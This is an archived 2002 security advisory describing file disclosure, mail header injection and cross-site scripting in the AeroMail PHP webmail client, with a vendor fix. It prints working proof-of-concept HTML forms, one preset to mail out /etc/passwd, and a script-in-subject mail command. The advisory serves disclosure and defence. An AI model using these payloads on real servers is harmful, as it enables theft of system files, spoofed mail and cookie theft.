[NEWS] AeroMail Multiple Vulnerabilities

From: support@securiteam.com
Date: 03/08/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Fri,  8 Mar 2002 11:23:12 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  AeroMail Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 <http://the.cushman.net/projects/aeromail/> AeroMail is a web-based
e-mail client written entirely in PHP using PHP's built in IMAP functions.

DETAILS

Vulnerable systems:
AeroMail versions prior to 1.45

Immune systems:
AeroMail version 1.45

Problem #1
When sending e-mails, you can trick the attachment subsystem into sending
local files from the web server or remote files from URL's instead of
uploaded files as it should.

How is that possible? Well, after PHP has uploaded a file, it sets a few
variables with information about it. One of them is the filename under
which the uploaded file has been temporarily stored. It is important to
check that this variable was set by uploading a file. It might also be
normal POSTed data, in which case you end up with this problem.

Problem #2
You can add additional headers to outgoing e-mail messages by sending some
normal data for the To or CC or Subject fields, a CRLF and then another
header with some data. (A lot of other programs allow this too. It's not
just AeroMail.) This can be used for adding uuencoded attachments up in
the headers with lines ending in CR instead of CRLF.

Problem #3
JavaScript and HTML code is active, when Subject headers are displayed.
This allows DoS attacks by redirecting, theft of cookies etc.

Issues 1 and 2 require a valid user/password combination to be exploited,
while issue 3 is open to anyone.

Solution:
The vendor was contacted with an explanation, two exploits and a patch on
the 23rd of February. Version 1.45, which is not vulnerable to any of
these issues, was released on the 27th of February.

Exploits:
Here are HTML exploits for issues 1 and 2.

Issue 3 doesn't need a special exploit - you just send an ordinary mail:

mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \
metaur@prontomail.com < /dev/null

Exploit #1:
<html>
<head>
<title>AeroMail Exploit 1</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>AeroMail Exploit 1</h1>

<form method="POST"
action="http://www.example.com/aeromail/send_message.php">
Written by <a href="mailto:metaur@prontomail.com">Ulf H&auml;rnhammar</a>
in 2002.<p>

<input type="hidden" name="return" value="INBOX" size="0">

To:<br>
<input type="text" name="to" size="50"><br>

Cc:<br>
<input type="text" name="cc" size="50"><br>

Attach (what file or URL to send):<br>
<input type="text" name="attach" size="50" value="/etc/passwd"><br>

Attach_size (in bytes, just enter something that is big enough):<br>
<input type="text" name="attach_size" size="50" value="2048"><br>

Attach_name (what the file or URL will be called in the MIME
headers):<br>
<input type="text" name="attach_name" size="50" value="passwd"><br>

Attach_type:<br>
<input type="text" name="attach_type" size="50" value=
"application/octet-stream"><br>

Subject:<br>
<input type="text" name="subject" size="50"><br>

Body:<br>
<textarea name="body" rows="5" cols="50">
</textarea><br>

<input type="submit" value="Exploit it">
</form>

</body>
</html>

Exploit #2:
<html>
<head>
<title>AeroMail Exploit 2</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#ffffff" text="#000000" link="#000000" alink="#000000"
vlink="#000000">
<h1>AeroMail Exploit 2</h1>

<form method="POST"
action="http://www.example.com/aeromail/send_message.php">
Written by <a href="mailto:metaur@prontomail.com">Ulf H&auml;rnhammar</a>
in 2002.<p>

Note: Don't press ENTER after the last header in any of the textareas.<p>

<input type="hidden" name="return" value="INBOX" size="0">

To:<br>
<textarea name="to" rows="5" cols="50">
metaur@prontomail.com
X-Header-1: Here are some
X-Header-2: extra mail headers</textarea><br>

Cc:<br>
<textarea name="cc" rows="5" cols="50">
ulfh@update.uu.se
X-Header-3: Here are a few more
X-Header-4: mail headers</textarea><br>

<input type="hidden" name="attach" value="none" size="0">
<input type="hidden" name="attach_size" value="0" size="0">
<input type="hidden" name="attach_name" value="" size="0">
<input type="hidden" name="attach_type" value=
"application/octet-stream" size="0">

Subject:<br>
<textarea name="subject" rows="5" cols="50">
AeroMail Exploit 2
X-Header-5: Here are the last
X-Header-6: extra mail headers</textarea><br>

Body:<br>
<textarea name="body" rows="5" cols="50">
</textarea><br>

<input type="submit" value="Exploit it">
</form>

</body>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:ulfh@update.uu.se> Ulf
Harnhammar.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: How could this possibly happen (HttpURLConnection + simple JSP page)
    ... In PHP that would throw some nasty HTTP-related warnings and potentially break the page as you are changing the headers after HTML display? ... You are writing code in a special format that is compiled in to a servlet, which is then executed by the server when the page is requested. ... The other thing is that writing things "after HTML display" is probably very difficult as the display is done on the users computer when they have recieved the response. ... When you create a response for the user it does not necessarily get sent back as soon as you start, and more importantly the headers do not necessarily finish as soon as you start writing to the body. ...
    (comp.lang.java.help)
  • Re: OE6 and Hotmail
    ... Robert Aldwinckle wrote: ... From his screen shot and as far as I can tell, 'cos I just tried the same he has indeed done a file>save as HTML for offline viewing, that's the default setting for saving. ... look at the headers for an E-mail which you sent in your Sent Items folder ... headers in it with the equivalent data from the saved message in the HTML. ...
    (microsoft.public.windows.inetexplorer.ie6_outlookexpress)
  • force-downloaded report file flooded with HTML by mistake
    ... class ReportGenerator { ... function ReportGenerator() ... Generate the HTTP headers necessary for this file type. ... The force-downloaded file you get is completely flooded with HTML, ...
    (comp.lang.php)
  • Re: Whats the real content type of XHTML?
    ... Is that something in the HTML file itself, ... This response consists of a number of headers followed by the ...
    (alt.html)
  • AeroMail multiple vulnerabilities
    ... AeroMail multiple vulnerabilities ... this variable was set by uploading a file. ... You can add additional headers to outgoing e-mail messages by sending some ...
    (Bugtraq)